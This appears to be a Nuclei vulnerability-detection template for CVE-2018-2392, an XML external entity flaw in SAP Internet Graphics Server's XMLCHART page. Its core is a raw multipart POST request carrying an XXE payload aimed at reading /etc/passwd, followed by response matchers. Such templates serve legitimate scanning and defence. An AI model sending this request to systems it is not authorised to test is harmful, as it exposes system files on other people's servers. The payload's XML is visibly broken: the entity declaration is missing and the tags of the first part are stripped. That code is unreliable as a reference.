id: CVE-2018-2392 info: name: SAP Internet Graphics Server (IGS) - XML External Entity Injection author: _generic_human_ severity: high description: | SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XML external entity injection (XXE) vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart. reference: - https://launchpad.support.sap.com/#/notes/2525222 - https://blogs.sap.com/2018/02/13/sap-security-patch-day-february-2018/ - https://www.rapid7.com/db/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe/ - https://troopers.de/troopers18/agenda/3r38lr/ - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb - https://nvd.nist.gov/vuln/detail/CVE-2018-2392 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2018-2392 cwe-id: CWE-611 tags: cve,cve2018,sap,igs,xxe,xmlchart,msf requests: - raw: - | POST /XMLCHART HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary={{randstr_1}} --{{randstr_1}} Content-Disposition: form-data; name="{{randstr_2}}"; filename="{{randstr_3}}.xml" Content-Type: application/xml ALttP 12345 --{{randstr_1}} Content-Disposition: form-data; name="{{randstr_5}}"; filename="{{randstr_6}}.xml" Content-Type: application/xml ]> <Extension>&xxe;</Extension> --{{randstr_1}}-- # file name - /etc/passwd matchers-condition: and matchers: - type: word words: - "Picture" - "Info" - "/output/" part: body condition: and - type: word words: - "ImageMap" - "Errors" part: body condition: or - type: status status: - 200 - type: word words: - "text/html" - "SAP Internet Graphics Server" part: header condition: and # Enhanced by mp on 2022/07/08